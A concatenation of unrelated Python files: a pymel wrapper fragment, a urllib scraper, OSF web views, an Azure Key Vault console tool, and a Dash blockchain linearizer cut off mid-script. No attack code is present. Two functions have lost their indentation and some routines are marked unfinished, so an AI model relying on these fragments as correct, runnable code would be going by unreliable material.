                              old_code.co_varnames,
                              old_code.co_filename,
                              str('%s_wrapped' % cmdname),  # unicode no good
                              old_code.co_firstlineno,
                              old_code.co_lnotab,
                              old_code.co_freevars,
                              old_code.co_cellvars)
    # Rebuild the function around the renamed code object, preserving
    # globals, defaults and closure.
    wrappedCmd = types.FunctionType(new_code,
                                    wrappedCmd.func_globals,
                                    str(newname),  # unicode no good
                                    wrappedCmd.func_defaults,
                                    wrappedCmd.func_closure)
    wrappedCmd.__doc__ = cmd.__doc__
    # for debugging, to make sure commands got wrapped...
    #wrappedCmd = _testDecorator(wrappedCmd)
    # so that we can identify that this is a wrapped maya command
    setattr(_thisModule, cmdname, wrappedCmd)
    #globals()[cmdname] = wrappedCmd
def removeWrappedCmd(cmdname):
    '''Remove the wrapped command named *cmdname* from this module.

    BUG FIX: the previous implementation did ``del cmdname``, which only
    unbound the local parameter -- it never removed the module attribute
    installed by addWrappedCmd, and never raised NameError, so the warning
    below was unreachable.
    '''
    try:
        delattr(_thisModule, cmdname)
    except AttributeError:
        warnings.warn("%s not found in %s" % (cmdname, __name__))
def addAllWrappedCmds():
    '''Install a pymel wrapper for every callable exposed by maya.cmds.'''
    for name, func in inspect.getmembers(maya.cmds, callable):
        addWrappedCmd(name, func)
| |
import urllib.request
import json
class WS:
    """Small web-scraping toolkit.

    ``extract`` downloads pages, ``scratch`` pulls product urls out of a
    page, ``decripter`` parses raw HTML into ``[tag, content, index]``
    triples, and ``int_fil`` filters those triples by tag prefix.

    All methods are stateless, so they are declared as staticmethods and
    called directly on the class, e.g. ``WS.extract(...)``.
    """

    @staticmethod
    def extract(l_url, m_url=''):
        """Yield the decoded HTML for each url in *l_url*.

        Relative urls such as ``/product/tea-bags/`` are completed by
        prefixing *m_url* (e.g. ``"https://www.teashop.com"``); leave
        *m_url* empty when the urls are already absolute.

        A generator is used deliberately: callers can write each page to
        disk as it arrives instead of holding every page in memory.
        """
        # Prefix each url with the main url so relative links resolve.
        temp = [m_url + x for x in l_url]
        # Progress counter, purely informational.
        a = 0
        for x in temp:
            print(str(a) + ' "' + x + '"')
            print()
            # Fetch the page and hand its decoded body to the caller.
            with urllib.request.urlopen(x) as response:
                yield response.read().decode('utf-8')
            a += 1

    @staticmethod
    def scratch(urlsearch, template, exc):
        """Return the deduplicated product urls found on page *urlsearch*.

        :param urlsearch: url of the page to scan for product links.
        :param template: path of a JSON file holding the tag filter passed
            to ``int_fil`` (e.g. ``{"filter": ["a href=\\"..."]}``).
        :param exc: leading part of each found url to strip, counted from
            the left; pass ``''`` to keep the whole url.
        """
        scrapped = []
        with urllib.request.urlopen(urlsearch) as response:
            with open(template) as file:
                for x in WS.int_fil(WS.decripter(response.read().decode('utf-8')),
                                    json.loads(file.read())):
                    scrapped.append(x)
        result = []
        for x in scrapped:
            # Skip past 'a href="<exc>' in the tag text, then copy
            # everything up to the closing quote of the href attribute.
            z = len('a href="{}'.format(exc))
            a = z
            while x[0][a] != '"':
                a += 1
            result.append(x[0][z:a])
        # A set drops duplicate urls; convert back to a list so callers
        # get an ordinary, indexable result.
        return list(set(result))

    @staticmethod
    def int_fil(html, template):
        """Filter decripted triples by tag prefix.

        *html* is a list of ``[tag, content, index]`` triples (the output
        of ``decripter``); *template* is ``{'filter': [<tag prefix>, ...]}``.
        A triple is kept when its tag starts with one of the filter
        strings, for example::

            WS.int_fil([['p', 'Hello', 0], ['h1', 'World', 1], ['div', '!', 2]],
                       {'filter': ['p', 'h1']})
            # -> [['p', 'Hello', 0], ['h1', 'World', 1]]
        """
        datafilterd = []
        tl = 0
        while tl != len(template['filter']):
            x = 0
            while x != len(html):
                # Compare only the tag's leading characters against the
                # filter entry, so 'p style="..."' still matches 'p'.
                if html[x][0][:len(template['filter'][tl])] == template['filter'][tl]:
                    datafilterd.append(html[x])
                x += 1
            tl += 1
        return datafilterd

    @staticmethod
    def decripter(html):
        """Parse raw *html* into indexed ``[tag, content, index]`` triples."""
        def __INDEX__(html):
            """Append each triple's list position as its third element."""
            x = 0
            while x != len(html):
                html[x].append(x)
                x += 1
            return html

        def __EXTRACT__(html):
            """Return *html* with every newline removed (single string pass
            instead of the original char-by-char list shuffle)."""
            return html.replace('\n', '')

        def __DECRIPT__(html):
            """Split flattened *html* into ``[tag, content]`` pairs.

            Known limitation (unchanged from the original): content is cut
            at the first closing tag found, so an ending nested tag
            truncates the enclosing tag's content.
            """
            line = []
            for x in range(len(html)):
                # Gate: only react to opening tags; '</' marks a closer.
                if html[x:x + 2] != '</':
                    if html[x] == '<':
                        # Scan to the end of the tag itself.
                        temp = x
                        while html[temp] != '>':
                            temp += 1
                        # Scan to the next closing tag; the span between is
                        # taken as this tag's content.
                        temp2 = temp
                        while html[temp2:temp2 + 2] != '</':
                            temp2 += 1
                        line.append([html[x + 1:temp], html[temp + 1:temp2]])
            return line

        return __INDEX__(__DECRIPT__(__EXTRACT__(html)))
if __name__ == '__main__':
    # Demo run: collect product urls from the muscletech catalogue page
    # (filter template read from sup.txt), then download each product page
    # and save its filtered content as JSON under data/<n>.
    x = 0
    for html in WS.extract(WS.scratch("http://international.muscletech.com/products/",
                                      "sup.txt",
                                      ""),
                           "http://international.muscletech.com"):
        _html = WS.int_fil(WS.decripter(html), {'filter': ["div id=\"mk-text-block-"]})
        with open('data/'+str(x), 'w') as f:
            _html = json.dumps({'data': _html})
            f.write(_html)
        x += 1
        # Stop after the first six pages.
        if not x < 6:
            break
| |
# -*- coding: utf-8 -*-
import itertools
import httplib as http
import logging
import math
import os
import urllib
from django.apps import apps
from flask import request, send_from_directory
from framework import utils, sentry
from framework.auth.decorators import must_be_logged_in
from framework.auth.forms import SignInForm, ForgotPasswordForm
from framework.exceptions import HTTPError
from framework.flask import redirect # VOL-aware redirect
from framework.forms import utils as form_utils
from framework.routing import proxy_url
from framework.auth.core import get_current_user_id
from website.institutions.views import serialize_institution
from website.models import Guid
from website.models import Institution, PreprintService
from website.settings import EXTERNAL_EMBER_APPS
from website.util import permissions
logger = logging.getLogger(__name__)
def _render_node(node, auth=None, parent_node=None):
    """Serialize *node* into the dict shape used by the project listings.

    :param node: node to serialize
    :param auth: optional auth context used to resolve permissions
    :param parent_node: optional parent, used to detect node links
    :return: dict of node metadata
    """
    NodeRelation = apps.get_model('osf.NodeRelation')
    # NOTE: auth.user may be None if viewing public project while not
    # logged in
    perm = None
    if auth and auth.user and node.get_permissions(auth.user):
        perm = permissions.reduce_permissions(node.get_permissions(auth.user))
    # Default: treat the node as a primary child under its own id.
    primary = True
    _id = node._id
    if parent_node:
        try:
            relation = parent_node.node_relations.get(child__id=node.id)
        except NodeRelation.DoesNotExist:
            primary = False
        else:
            primary = not relation.is_node_link
            if not primary:
                # Node links are addressed by the relation's id instead.
                _id = relation._id
    return {
        'title': node.title,
        'id': _id,
        'url': node.url,
        'api_url': node.api_url,
        'primary': primary,
        'date_modified': utils.iso8601format(node.date_modified),
        'category': node.category,
        'permissions': perm,  # A string, e.g. 'admin', or None,
        'archiving': node.archiving,
        'is_retracted': node.is_retracted,
        'is_registration': node.is_registration,
    }
def _render_nodes(nodes, auth=None, show_path=False, parent_node=None):
"""
:param nodes:
:return:
"""
ret = {
'nodes': [
_render_node(node, auth=auth, parent_node=parent_node)
for node in nodes
],
'show_path': show_path
}
return ret
def index():
    """Serve the landing page: institution page, user dashboard data, or
    the logged-out home page, in that order of precedence."""
    # Institution landing page wins when the request host matches a
    # registered institution domain.
    # TODO: make this way more robust
    try:
        institution = Institution.objects.get(
            domains__contains=[request.host.lower()], is_deleted=False)
    except Institution.DoesNotExist:
        pass
    else:
        inst_dict = serialize_institution(institution)
        inst_dict.update({
            'home': False,
            'institution': True,
            'redirect_url': '/institutions/{}/'.format(institution._id),
        })
        return inst_dict

    if not get_current_user_id():
        # Logged out: plain landing page
        return {
            'home': True,
        }

    # Logged in: include the institution list shown on the dashboard.
    all_institutions = Institution.objects.filter(
        is_deleted=False).order_by('name').only('_id', 'name', 'logo_name')
    return {
        'home': True,
        'dashboard_institutions': [
            {'id': inst._id, 'name': inst.name,
             'logo_path': inst.logo_path_rounded_corners}
            for inst in all_institutions
        ],
    }
def find_bookmark_collection(user):
    """Return *user*'s bookmark collection (the non-deleted one)."""
    Collection = apps.get_model('osf.Collection')
    return Collection.objects.get(
        creator=user, is_bookmark_collection=True, is_deleted=False)
@must_be_logged_in
def dashboard(auth):
    # Legacy dashboard route; the dashboard now lives on the home page.
    return redirect('/')
@must_be_logged_in
def my_projects(auth):
    """Return the enabled add-on names and bookmark-collection id for the
    logged-in user."""
    user = auth.user
    return {
        'addons_enabled': user.get_addon_names(),
        'dashboard_id': find_bookmark_collection(user)._id,
    }
def validate_page_num(page, pages):
    """Raise HTTPError(400) unless *page* is a valid 0-based page index.

    When *pages* is falsy (no pages known), any non-negative page passes.
    """
    out_of_range = pages and page >= pages
    if page < 0 or out_of_range:
        raise HTTPError(http.BAD_REQUEST, data=dict(
            message_long='Invalid value for "page".'
        ))
def paginate(items, total, page, size):
    """Slice *items* to the requested page.

    :param items: iterable of items (consumed lazily)
    :param total: total number of items available
    :param page: 0-based page index
    :param size: items per page
    :return: (iterator over the page's items, total page count)
    """
    page_count = math.ceil(total / float(size))
    validate_page_num(page, page_count)
    offset = page * size
    return itertools.islice(items, offset, offset + size), page_count
def reproducibility():
    # Legacy route: forward to the reproducibility project's wiki.
    return redirect('/ezcuj/wiki')
def signin_form():
    # JSON description of the sign-in form for the client.
    return form_utils.jsonify(SignInForm())
def forgot_password_form():
    # JSON description of the forgot-password form; note the field prefix.
    return form_utils.jsonify(ForgotPasswordForm(prefix='forgot_password'))
# GUID ###
def _build_guid_url(base, suffix=None):
    """Join *base* and an optional *suffix* into a slash-wrapped url."""
    segments = [part.strip('/') for part in (base, suffix) if part]
    url = '/'.join(segments)
    # Python 2: promote byte strings to unicode before formatting.
    if not isinstance(url, unicode):
        url = url.decode('utf-8')
    return u'/{0}/'.format(url)
def resolve_guid(guid, suffix=None):
    """Load GUID by primary key, look up the corresponding view function in the
    routing table, and return the return value of the view function without
    changing the URL.

    :param str guid: GUID primary key
    :param str suffix: Remainder of URL after the GUID
    :return: Return value of proxied view function
    :raises HTTPError: 404 when the GUID or its referent cannot be resolved
    """
    try:
        # Look up
        guid_object = Guid.load(guid)
    except KeyError as e:
        # Python 2 only: KeyError.message holds the missing model name.
        if e.message == 'osfstorageguidfile':  # Used when an old detached OsfStorageGuidFile object is accessed
            raise HTTPError(http.NOT_FOUND)
        else:
            raise e
    if guid_object:
        # verify that the object implements a GuidStoredObject-like interface. If a model
        # was once GuidStoredObject-like but that relationship has changed, it's
        # possible to have referents that are instances of classes that don't
        # have a deep_url attribute or otherwise don't behave as
        # expected.
        if not hasattr(guid_object.referent, 'deep_url'):
            sentry.log_message(
                'Guid `{}` resolved to an object with no deep_url'.format(guid)
            )
            raise HTTPError(http.NOT_FOUND)
        referent = guid_object.referent
        if referent is None:
            logger.error('Referent of GUID {0} not found'.format(guid))
            raise HTTPError(http.NOT_FOUND)
        if not referent.deep_url:
            raise HTTPError(http.NOT_FOUND)
        # Preprints are served by the external Ember app rather than proxied.
        if isinstance(referent, PreprintService):
            return send_from_directory(
                os.path.abspath(os.path.join(os.getcwd(), EXTERNAL_EMBER_APPS['preprints']['path'])),
                'index.html'
            )
        url = _build_guid_url(urllib.unquote(referent.deep_url), suffix)
        return proxy_url(url)
    # GUID not found; try lower-cased and redirect if exists
    guid_object_lower = Guid.load(guid.lower())
    if guid_object_lower:
        return redirect(
            _build_guid_url(guid.lower(), suffix)
        )
    # GUID not found
    raise HTTPError(http.NOT_FOUND)
# Redirects #

# redirect osf.io/about/ to OSF wiki page osf.io/4znzp/wiki/home/
def redirect_about(**kwargs):
    return redirect('https://osf.io/4znzp/wiki/home/')

# redirect the old help route to the FAQ page
def redirect_help(**kwargs):
    return redirect('/faq/')

# redirect osf.io/howosfworks to osf.io/getting-started/
def redirect_howosfworks(**kwargs):
    return redirect('/getting-started/')

# redirect osf.io/getting-started to help.osf.io/
def redirect_getting_started(**kwargs):
    return redirect('http://help.osf.io/')

# Redirect to home page
def redirect_to_home():
    return redirect('/')

def redirect_to_cos_news(**kwargs):
    # Redirect to COS News page
    return redirect('https://cos.io/news/')
| |
#!/usr/local/bin/python
from azure.mgmt.keyvault.models import Sku
from azure.mgmt.keyvault.models import VaultCreateOrUpdateParameters, VaultProperties, SkuName, AccessPolicyEntry, \
Permissions, KeyPermissions, SecretPermissions, CertificatePermissions
from azure.keyvault import KeyVaultClient, KeyVaultAuthentication
from azure.keyvault.models import JsonWebKeyType
from azure.mgmt.keyvault import KeyVaultManagementClient
import json
import os
import sys
from key_vault_config import KeyVaultConfig
from key_vault_auth import KeyVaultAuth
CLIENT_ID = '8fd4d3c4-efea-49aa-b1de-2c33c22da56e' # Azure cli
CLIENT_OID = '8694d835-b4e2-419a-a315-b13c854166e2'
CLIENT_TENANT_ID = 'a7fc734e-9961-43ce-b4de-21b8b38403ba'
def _json_format(obj):
return json.dumps(obj, sort_keys=True, indent=4, separators=(',', ': '))
class KV_Repl(object):
    """Interactive console for browsing and editing Azure Key Vaults.

    The UI is a stack of menu loops (vault index -> selected vault ->
    secret/key index).  Each loop redraws its menu, reads one selection via
    _continue_repl, and dispatches on it until the user backs out or quits.
    """

    # Inputs that leave the current sub-menu / quit the whole REPL.
    _repl_break_commands = set(('back', 'b'))
    _repl_quit_commands = set(('quit', 'q'))

    def __init__(self, config):
        self._auth = KeyVaultAuth(config, CLIENT_ID)
        self._config = config
        # Management-plane client (vault CRUD)...
        self._mgmt_client = KeyVaultManagementClient(self._auth.get_arm_creds(), config.subscription_id)
        # ...and data-plane client (secrets / keys inside a vault).
        self._data_client = KeyVaultClient(self._auth.get_keyvault_creds())
        self._selected_vault = None
        # Items listed by the most recent _display_* call; numeric menu
        # selections index into this list.
        self._current_index = None

    def start(self):
        """Run the top-level vault menu; sys.exit from any menu lands here."""
        try:
            self._vault_index_loop()
        except SystemExit:
            print('\nuser exited\n')

    def _continue_repl(self, display_action, break_commands=()):
        """Draw a menu and read one selection.

        Returns None for a break command, exits the process for a quit
        command, and otherwise returns the selection (converted to int
        when the input was numeric).
        """
        display_action()
        self._selection = input('> ').lower()
        if self._selection in break_commands:
            return None
        elif self._selection in KV_Repl._repl_quit_commands:
            sys.exit()
        try:
            self._selection = int(self._selection)
        except ValueError:
            pass
        return self._selection

    def _display_vault_index(self):
        """List every vault in the subscription with its menu number."""
        print('\nAvailable Vaults:\n')
        self._current_index = self._get_vault_list()
        for idx, vault in enumerate(self._current_index):
            print('%d. %s' % (idx, vault.name))
        print('\n#:select | (a)dd | (d)elete | (q)uit')

    def _vault_index_loop(self):
        """Top-level menu: select an existing vault or create a new one."""
        while self._continue_repl(self._display_vault_index) is not None:
            vaults = self._current_index
            if isinstance(self._selection, int):
                i = self._selection
                if i >= 0 and i < len(vaults):
                    self._selected_vault = self._mgmt_client.vaults.get(self._config.resource_group, vaults[i].name)
                    self._vault_detail_loop()
                else:
                    print('invalid vault index')
            elif self._selection == 'a' or self._selection == 'add':
                self._add_vault()
            else:
                print('invalid input')

    def _add_vault(self):
        """Create a vault granting full key/secret/certificate access to the
        current user and to this client application."""
        name = input('\nenter vault name:')
        all_perms = Permissions()
        all_perms.keys = [KeyPermissions.all]
        all_perms.secrets = [SecretPermissions.all]
        all_perms.certificates = [CertificatePermissions.all]
        user_policy = AccessPolicyEntry(self._config.tenant_id, self._config.user_oid, all_perms)
        app_policy = AccessPolicyEntry(CLIENT_TENANT_ID, CLIENT_OID, all_perms)
        access_policies = [user_policy, app_policy]
        properties = VaultProperties(self._config.tenant_id, Sku(name='standard'), access_policies)
        properties.enabled_for_deployment = True
        properties.enabled_for_disk_encryption = True
        properties.enabled_for_template_deployment = True
        vault = VaultCreateOrUpdateParameters(self._config.location, properties)
        self._mgmt_client.vaults.create_or_update(self._config.resource_group, name, vault)
        print('vault %s created\n' % name)

    def _display_selected_vault_detail(self):
        """Show the selected vault's identity and the vault-level menu."""
        print('\nName:\t%s' % self._selected_vault.name)
        print('Uri:\t%s' % self._selected_vault.properties.vault_uri)
        print('Id:\t%s' % self._selected_vault.id)
        print('\n(s)ecrets | (k)eys | (c)ertificates | (e)ncrypt | (d)ecrypt | (b)ack | (q)uit\n')

    def _vault_detail_loop(self):
        """Menu for one vault: drill into secrets, keys or certificates."""
        while self._continue_repl(self._display_selected_vault_detail, break_commands=KV_Repl._repl_break_commands) is not None:
            if self._selection == 's' or self._selection == 'secrets':
                self._secret_index_loop()
            elif self._selection == 'k' or self._selection == 'keys':
                self._key_index_loop()
            elif self._selection == 'c' or self._selection == 'certificates':
                print('\nnot yet implemented\n')
            elif self._selection == 'e' or self._selection == 'encrypt':
                self._encrypt_file()
            else:
                print('invalid input')

    def _encrypt_file(self):
        # NOTE(review): unfinished command -- it prompts for both paths but
        # never performs the encryption, and the output-path loop below has
        # no exit condition yet.
        while True:
            inpath = input('input file: ')
            if os.path.isfile(inpath):
                break
            else:
                print('error: file not found')
        while True:
            outpath = input('output file: ')

    @staticmethod
    def _prompt_for_file_path(prompt, verify_exists):
        # NOTE(review): unfinished helper -- reads the path but does not yet
        # verify or return it.
        inpath = input(prompt)

    def _display_secret_index(self):
        """List the selected vault's secrets with their menu numbers."""
        self._current_index = []
        secret_iter = self._data_client.get_secrets(self._selected_vault.properties.vault_uri)
        if secret_iter is not None:
            try:
                self._current_index = [secret for secret in secret_iter]
            except TypeError:
                pass
        print('\n%s Secrets:\n' % self._selected_vault.name)
        for idx, s in enumerate(self._current_index):
            print('%d. %s' % (idx, KV_Repl._get_name_from_url(s.id)))
        print('\n#:show secret value (a)dd (d)elete (b)ack (q)uit\n')

    def _secret_index_loop(self):
        """Menu for the vault's secrets: show a value or add a secret."""
        while self._continue_repl(self._display_secret_index, break_commands=KV_Repl._repl_break_commands) is not None:
            secrets = self._current_index
            if isinstance(self._selection, int):
                i = self._selection
                if i >= 0 and i < len(secrets):
                    # BUG FIX: the original called _get_secret_name_from_url,
                    # which was never defined; _get_name_from_url is the
                    # helper that extracts the trailing url segment.
                    print('\n%s = %s\n' % (KV_Repl._get_name_from_url(secrets[i].id), self._data_client.get_secret(secrets[i].id).value))
                else:
                    print('invalid secret index')
            elif self._selection == 'a' or self._selection == 'add':
                self._add_secret()
            elif self._selection == 'd' or self._selection == 'delete':
                print('\nnot yet implemented\n')

    def _add_secret(self):
        """Prompt for a name/value pair and store it in the selected vault."""
        secret_name = input('\nSecret Name: ')
        secret_value = input('Secret Value: ')
        self._data_client.set_secret(self._selected_vault.properties.vault_uri, secret_name, secret_value)
        print('\nSecret %s added to vault %s' % (secret_name, self._selected_vault.name))

    def _display_key_index(self):
        """List the selected vault's keys with their menu numbers."""
        self._current_index = []
        key_iter = self._data_client.get_keys(self._selected_vault.properties.vault_uri)
        if key_iter is not None:
            try:
                self._current_index = [key for key in key_iter]
            except TypeError:
                print('warning: caught TypeError')
                pass
        print('\n%s Keys:\n' % self._selected_vault.name)
        for idx, k in enumerate(self._current_index):
            print('%d. %s' % (idx, KV_Repl._get_name_from_url(k.kid)))
        print('\n#:get key | (a)dd | (i)mport | (d)elete | (b)ack | (q)uit\n')

    def _key_index_loop(self):
        """Menu for the vault's keys: show a key or add one."""
        while self._continue_repl(self._display_key_index, break_commands=KV_Repl._repl_break_commands) is not None:
            keys = self._current_index
            if isinstance(self._selection, int):
                i = self._selection
                if i >= 0 and i < len(keys):
                    # BUG FIX: _get_secret_name_from_url was never defined;
                    # use _get_name_from_url.
                    # NOTE(review): this branch still accesses keys[i].id and
                    # get_secret, while _display_key_index uses k.kid --
                    # looks copy-pasted from the secret loop; verify against
                    # the KeyVaultClient API before relying on it.
                    print('\n%s = %s\n' % (KV_Repl._get_name_from_url(keys[i].id), self._data_client.get_secret(keys[i].id).value))
                else:
                    print('invalid key index')
            elif self._selection == 'a' or self._selection == 'add':
                self._add_key()
            elif self._selection == 'd' or self._selection == 'delete':
                print('\nnot yet implemented\n')

    def _add_key(self):
        """Prompt for a name and create an RSA key in the selected vault."""
        key_name = input('\nKey Name: ')
        self._data_client.create_key(self._selected_vault.properties.vault_uri, key_name, kty=JsonWebKeyType.rsa.value)
        # BUG FIX: message said "Secret %s added" for a key.
        print('\nKey %s added to vault %s' % (key_name, self._selected_vault.name))

    @staticmethod
    def _get_name_from_url(url):
        """Return the last path segment of *url* (the object's name)."""
        split = url.split('/')
        return split[len(split) - 1]

    def _get_vault_list(self):
        """Return all vaults in the subscription as a list."""
        return list(self._mgmt_client.vaults.list())
# Script entry: load the persisted configuration, run the interactive REPL,
# then write any configuration changes back to disk.
config = KeyVaultConfig()
config.from_disk()
repl = KV_Repl(config)
repl.start()
config.to_disk()
| |
#!/usr/bin/env python3
#
# linearize-data.py: Construct a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2014 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from __future__ import print_function, division
import struct
import re
import os
import os.path
import sys
import hashlib
import dash_hash
import datetime
import time
from collections import namedtuple
from binascii import hexlify, unhexlify
settings = {}
##### Switch endian-ness #####
def hex_switchEndian(s):
    """Switches the endianness of a hex string (in pairs of hex chars)."""
    pairs = [s[i:i + 2] for i in range(0, len(s), 2)]
    return ''.join(reversed(pairs))
def uint32(x):
    """Truncate *x* to an unsigned 32-bit value."""
    return x % 0x100000000
def bytereverse(x):
    """Swap the byte order of a 32-bit word (result truncated to 32 bits)."""
    swapped = ((x << 24) | ((x << 8) & 0x00ff0000) |
               ((x >> 8) & 0x0000ff00) | (x >> 24))
    return swapped & 0xffffffff
def bufreverse(in_buf):
    """Byte-swap every aligned 32-bit word of *in_buf*."""
    out = []
    for off in range(0, len(in_buf), 4):
        (word,) = struct.unpack('@I', in_buf[off:off + 4])
        # Inline 32-bit byte swap (same arithmetic as bytereverse/uint32).
        word = ((word << 24) | ((word << 8) & 0x00ff0000) |
                ((word >> 8) & 0x0000ff00) | (word >> 24)) & 0xffffffff
        out.append(struct.pack('@I', word))
    return b''.join(out)
def wordreverse(in_buf):
    """Reverse the order of the 32-bit words in *in_buf*; bytes within each
    word keep their order."""
    return b''.join(in_buf[i:i + 4]
                    for i in reversed(range(0, len(in_buf), 4)))
def calc_hdr_hash(blk_hdr):
    """Return the proof-of-work hash of a block header via dash_hash.

    (The commented-out double-sha256 code from the upstream Bitcoin script
    was removed; this chain hashes headers with dash_hash.getPoWHash.)
    """
    return dash_hash.getPoWHash(blk_hdr)
def calc_hash_str(blk_hdr):
    """Return the header's PoW hash as a hex string in display byte order."""
    reordered = wordreverse(bufreverse(calc_hdr_hash(blk_hdr)))
    return hexlify(reordered).decode('utf-8')
def get_blk_dt(blk_hdr):
    """Read the block timestamp from a header.

    Returns (datetime truncated to the first of the month, raw unix time);
    the month value drives the split_timestamp output rotation.
    """
    # nTime is the little-endian uint32 at header offset 68.
    (nTime,) = struct.unpack("<I", blk_hdr[68:68 + 4])
    stamp = datetime.datetime.fromtimestamp(nTime)
    return (datetime.datetime(stamp.year, stamp.month, 1), nTime)
# When getting the list of block hashes, undo any byte reversals.
def get_block_hashes(settings):
    """Read the ordered block-hash list from settings['hashlist'].

    Hashes are returned in file order; when settings['rev_hash_bytes'] is
    'true', each hash is byte-reversed via hex_switchEndian first.
    """
    blkindex = []
    # BUG FIX: the file handle was never closed; 'with' guarantees it.
    with open(settings['hashlist'], "r") as f:
        for line in f:
            line = line.rstrip()
            if settings['rev_hash_bytes'] == 'true':
                line = hex_switchEndian(line)
            blkindex.append(line)
    print("Read " + str(len(blkindex)) + " hashes")
    return blkindex
# The block map shouldn't give or receive byte-reversed hashes.
def mkblockmap(blkindex):
    """Map block hash -> height for the ordered hash list *blkindex*."""
    return {blk_hash: height for height, blk_hash in enumerate(blkindex)}
# Block header and extent on disk: input file number, byte offset of the
# block payload, the 8-byte magic+length header, the 80-byte block header,
# and the payload size in bytes.
BlockExtent = namedtuple('BlockExtent', ['fn', 'offset', 'inhdr', 'blkhdr', 'size'])
class BlockDataCopier:
    """Copies blocks from the blk*.dat input files into linearized output,
    emitting them in the height order given by the hash -> height map."""

    def __init__(self, settings, blkindex, blkmap):
        self.settings = settings
        self.blkindex = blkindex       # ordered list of block hashes
        self.blkmap = blkmap           # hash -> height
        self.inFn = 0                  # current input file number
        self.inF = None                # current input file handle
        self.outFn = 0                 # current output file number
        self.outsz = 0                 # bytes written to current output file
        self.outF = None
        self.outFname = None
        self.blkCountIn = 0
        self.blkCountOut = 0
        self.lastDate = datetime.datetime(2000, 1, 1)
        self.highTS = 1408893517 - 315360000
        self.timestampSplit = False
        self.fileOutput = True         # single output file vs. a directory
        self.setFileTime = False
        self.maxOutSz = settings['max_out_sz']
        if 'output' in settings:
            self.fileOutput = False
        if settings['file_timestamp'] != 0:
            self.setFileTime = True
        if settings['split_timestamp'] != 0:
            self.timestampSplit = True
        # Extents and cache for out-of-order blocks
        self.blockExtents = {}
        self.outOfOrderData = {}
        self.outOfOrderSize = 0  # running total size for items in outOfOrderData

    def _closeOutput(self):
        """Close the current output file (stamping its mtime with the
        highest block timestamp seen, if requested) and advance to the
        next output file number."""
        self.outF.close()
        if self.setFileTime:
            os.utime(self.outFname, (int(time.time()), self.highTS))
        self.outF = None
        self.outFname = None
        self.outFn = self.outFn + 1
        self.outsz = 0

    def writeBlock(self, inhdr, blk_hdr, rawblock):
        """Append one block to the output, rotating output files when the
        size limit is exceeded or (optionally) when a new month starts."""
        blockSizeOnDisk = len(inhdr) + len(blk_hdr) + len(rawblock)
        if not self.fileOutput and ((self.outsz + blockSizeOnDisk) > self.maxOutSz):
            self._closeOutput()

        (blkDate, blkTS) = get_blk_dt(blk_hdr)
        if self.timestampSplit and (blkDate > self.lastDate):
            print("New month " + blkDate.strftime("%Y-%m") + " @ " + self.hash_str)
            self.lastDate = blkDate
            if self.outF:
                self._closeOutput()

        if not self.outF:
            if self.fileOutput:
                self.outFname = self.settings['output_file']
            else:
                self.outFname = os.path.join(self.settings['output'], "blk%05d.dat" % self.outFn)
            print("Output file " + self.outFname)
            self.outF = open(self.outFname, "wb")

        self.outF.write(inhdr)
        self.outF.write(blk_hdr)
        self.outF.write(rawblock)
        self.outsz = self.outsz + blockSizeOnDisk

        self.blkCountOut = self.blkCountOut + 1
        if blkTS > self.highTS:
            self.highTS = blkTS

        if (self.blkCountOut % 1000) == 0:
            print('%i blocks scanned, %i blocks written (of %i, %.1f%% complete)' %
                  (self.blkCountIn, self.blkCountOut, len(self.blkindex), 100.0 * self.blkCountOut / len(self.blkindex)))

    def inFileName(self, fn):
        """Path of input block file number *fn*."""
        return os.path.join(self.settings['input'], "blk%05d.dat" % fn)

    def fetchBlock(self, extent):
        '''Fetch block contents from disk given extents'''
        with open(self.inFileName(extent.fn), "rb") as f:
            f.seek(extent.offset)
            return f.read(extent.size)

    def copyOneBlock(self):
        '''Find the next block to be written in the input, and copy it to the output.'''
        extent = self.blockExtents.pop(self.blkCountOut)
        if self.blkCountOut in self.outOfOrderData:
            # If the data is cached, use it from memory and remove from the cache
            rawblock = self.outOfOrderData.pop(self.blkCountOut)
            self.outOfOrderSize -= len(rawblock)
        else:  # Otherwise look up data on disk
            rawblock = self.fetchBlock(extent)
        self.writeBlock(extent.inhdr, extent.blkhdr, rawblock)

    def run(self):
        """Scan the input files and emit every known block in height order."""
        while self.blkCountOut < len(self.blkindex):
            if not self.inF:
                fname = self.inFileName(self.inFn)
                print("Input file " + fname)
                try:
                    self.inF = open(fname, "rb")
                except IOError:
                    print("Premature end of block data")
                    return

            inhdr = self.inF.read(8)
            if (not inhdr or (inhdr[0] == "\0")):
                self.inF.close()
                self.inF = None
                self.inFn = self.inFn + 1
                continue

            inMagic = inhdr[:4]
            if (inMagic != self.settings['netmagic']):
                print("Invalid magic: " + hexlify(inMagic).decode('utf-8'))
                return
            inLenLE = inhdr[4:]
            su = struct.unpack("<I", inLenLE)
            inLen = su[0] - 80  # length without header
            blk_hdr = self.inF.read(80)
            inExtent = BlockExtent(self.inFn, self.inF.tell(), inhdr, blk_hdr, inLen)

            self.hash_str = calc_hash_str(blk_hdr)
            # BUG FIX: membership was tested against the module-global
            # blkmap/settings; use the instance's own copies.
            if not self.hash_str in self.blkmap:
                # Because blocks can be written to files out-of-order as of 0.10, the script
                # may encounter blocks it doesn't know about. Treat as debug output.
                if self.settings['debug_output'] == 'true':
                    print("Skipping unknown block " + self.hash_str)
                self.inF.seek(inLen, os.SEEK_CUR)
                continue

            blkHeight = self.blkmap[self.hash_str]
            self.blkCountIn += 1

            if self.blkCountOut == blkHeight:
                # If in-order block, just copy
                rawblock = self.inF.read(inLen)
                self.writeBlock(inhdr, blk_hdr, rawblock)
                # See if we can catch up to prior out-of-order blocks
                while self.blkCountOut in self.blockExtents:
                    self.copyOneBlock()
            else:  # If out-of-order, skip over block data for now
                self.blockExtents[blkHeight] = inExtent
                if self.outOfOrderSize < self.settings['out_of_order_cache_sz']:
                    # If there is space in the cache, read the data
                    # Reading the data in file sequence instead of seeking and fetching it later is preferred,
                    # but we don't want to fill up memory
                    self.outOfOrderData[blkHeight] = self.inF.read(inLen)
                    self.outOfOrderSize += inLen
                else:  # If no space in cache, seek forward
                    self.inF.seek(inLen, os.SEEK_CUR)

        print("Done (%i blocks written)" % (self.blkCountOut))
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("Usage: linearize-data.py CONFIG-FILE")
        sys.exit(1)

    # Parse the key=value config file, ignoring comment and malformed lines.
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue
        # parse key=value lines
